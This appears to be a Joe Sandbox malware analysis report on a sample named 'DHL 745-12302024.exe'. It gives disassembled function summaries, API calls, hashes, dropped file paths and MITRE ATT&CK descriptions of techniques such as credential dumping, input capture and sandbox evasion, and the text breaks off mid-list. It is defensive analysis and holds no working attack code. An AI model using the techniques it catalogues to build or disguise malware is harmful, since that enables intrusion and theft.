Function 00AC2D60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AC286B: SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00AC2884
Part of subcall function 00AC286B: SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00AC28B6

SendMessageW.USER32(?,0000110B,00000005,00000000), ref: 00AC2D80
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00AC2D90

Strings

@U=u, xrefs: 00AC2D80, 00AC2D90

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: 99c42d34f086770d0b362271815378fd52cf3a0d6c3d19df5851b8726f4df9ce
Instruction ID: a7abd4aa62c108253fd98b36864c1c868983c5b1eccda0a051e510161caa8621
Opcode Fuzzy Hash: 99c42d34f086770d0b362271815378fd52cf3a0d6c3d19df5851b8726f4df9ce
Instruction Fuzzy Hash: 66E0D8393483097FF6221B929D46FB7376CD768B61F11102AF30565091EEA2CC11D720

Function 00AF5829 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000133D,?,?), ref: 00AF5855
InvalidateRect.USER32(?,?,00000001), ref: 00AF5877

Strings

@U=u, xrefs: 00AF5855

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: InvalidateMessageRectSend
String ID: @U=u
API String ID: 909852535-2594219639
Opcode ID: 3ee458147f4fa07a02616fcbc345bf5c8c88e2654dad510c35fd8b12d61964a3
Instruction ID: 68f10cc697255f9cd4c58e5b733aa1afe338d6d4d0faa7bc63f6588cda3f49fa
Opcode Fuzzy Hash: 3ee458147f4fa07a02616fcbc345bf5c8c88e2654dad510c35fd8b12d61964a3
Instruction Fuzzy Hash: 2DF05432A04148AAD7208BB5DD44BF97BB8DB45321F0481B6F75AD9051D6308A81DB60

Function 00AC0B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00AC0B23

Strings

Error allocating memory., xrefs: 00AC0B1C
AutoIt, xrefs: 00AC0B17

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 954933744bdd8df65bc58cafe139ecd8a6c88451b63a2e888d612ed39fd1f010
Instruction ID: 759ab805002e1bdf4acab01fbffc52326d4616cf2bcbfb20109b68bdbb12917c
Opcode Fuzzy Hash: 954933744bdd8df65bc58cafe139ecd8a6c88451b63a2e888d612ed39fd1f010
Instruction Fuzzy Hash: 03E0D83228431C3AD22037D57E03FD97A848F05B20F10442AF74C954C38AE1259046E9

Function 00A80D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00A7F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00A80D71,?,?,?,00A6100A), ref: 00A7F7CE

IsDebuggerPresent.KERNEL32(?,?,?,00A6100A), ref: 00A80D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00A6100A), ref: 00A80D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00A80D7F

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 07263f7e36c5cf2e13eaa345a5d24f6a2c27f4563edc7e2ef53bd9d97fc9a65f
Instruction ID: 332b03f743af1ac69a5025097ccf50ae3f9d3c9ca64c419f180dd0206cffc157
Opcode Fuzzy Hash: 07263f7e36c5cf2e13eaa345a5d24f6a2c27f4563edc7e2ef53bd9d97fc9a65f
Instruction Fuzzy Hash: 69E039702003018FD360AFE9D904A967BE4AF00740F04892DE886C7651EBB0E448CB91

Function 00AD3017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00AD302F
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00AD3044

Strings

aut, xrefs: 00AD3038

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: db23ae86de058a45be2e80e40ea0f2d31d584380b759d58d520500bd06bd16c2
Instruction ID: dedc115c109755aa714d14ca5f05d4ef9a0dfc7a3eceacc6d75234831929d0c9
Opcode Fuzzy Hash: db23ae86de058a45be2e80e40ea0f2d31d584380b759d58d520500bd06bd16c2
Instruction Fuzzy Hash: FFD05E72500328A7DA30E7E5AD0EFDB3B6CDB05760F0006A1B655E20A2DAB09985CAD0

Function 00ABD21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00ABD220

Strings

X64, xrefs: 00ABD2A8
%.3d, xrefs: 00ABD22B

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 78b6e747784bb85b1970015e3698d3131b349b4e1ec4489a2403aab7a7686a3f
Instruction ID: 7fa38b8b9bd9691ce7b98c03e390f192abb6981f595880693403ba491e357dcd
Opcode Fuzzy Hash: 78b6e747784bb85b1970015e3698d3131b349b4e1ec4489a2403aab7a7686a3f
Instruction Fuzzy Hash: 13D012B1C09158E9CB50D6D0DD458F9B7BCEB48301F50C462F90A92042F624C609AB65

Function 00AF2322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00AF232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00AF233F

Part of subcall function 00ACE97B: Sleep.KERNEL32 ref: 00ACE9F3

Strings

Shell_TrayWnd, xrefs: 00AF2325

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 5d724b08d7e980a96083c49ff2e3af27b8b3c9b818a85848db282d198b5eaf10
Instruction ID: e89ed87287a6d7e57adbb4a823c2b7954fc17f8aa73674481cca1f2682e95134
Opcode Fuzzy Hash: 5d724b08d7e980a96083c49ff2e3af27b8b3c9b818a85848db282d198b5eaf10
Instruction Fuzzy Hash: B8D012763D4314B7E6A4F7F1ED0FFD6BA549B00B20F0149167749EA1E0C9F4A802CA54

Function 00AF2356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00AF236C
PostMessageW.USER32(00000000), ref: 00AF2373

Part of subcall function 00ACE97B: Sleep.KERNEL32 ref: 00ACE9F3

Strings

Shell_TrayWnd, xrefs: 00AF2365

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 83a54608c642b1e3d86d3230996297906502447ab68befc3765ad19e73149a57
Instruction ID: e7c80a2580e16f365276e5a5bba950ba2948f3faabdf1b4af796c8bc3bb5eab0
Opcode Fuzzy Hash: 83a54608c642b1e3d86d3230996297906502447ab68befc3765ad19e73149a57
Instruction Fuzzy Hash: 54D0C9723C5314BAE6A4E7B1AD0FFD6A6549B05B20F0149167645EA1E0C9B4A802CA54

Function 00AC2313 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00AC231F
SendMessageW.USER32(00000000,00001200,00000000,00000000), ref: 00AC232D

Strings

@U=u, xrefs: 00AC231F, 00AC232D

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: 0228a5d716d4c14e947fd2da801590e3cf10bc2b44860e46d56ae787e5a1583e
Instruction ID: e91a877823030d4e5d49b4157e6d6f72422307d64dab0d0f194ffc26706f9945
Opcode Fuzzy Hash: 0228a5d716d4c14e947fd2da801590e3cf10bc2b44860e46d56ae787e5a1583e
Instruction Fuzzy Hash: 60C08C311041C0BAF7700BE3BE0CC673E3DE7CBF21300200CB204C44A5866C0002C630

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DHL 745-12302024.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\F56GKLK7U4

C:\Users\user\AppData\Local\Temp\Sancha

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Windows Analysis Report
DHL 745-12302024.exe

Function 00A642DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 00A642A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 00AA2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Function 00A62CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 00AA065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 00A6344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00A62B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Function 00A63170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Function 0168EC78 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 00A62C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 0168EA78 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132
fileCOMMON

Function 00A63B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Function 0168D968 Relevance: 6.7, APIs: 4, Instructions: 720
processthreadCOMMON

Function 00A63923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94
windowCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
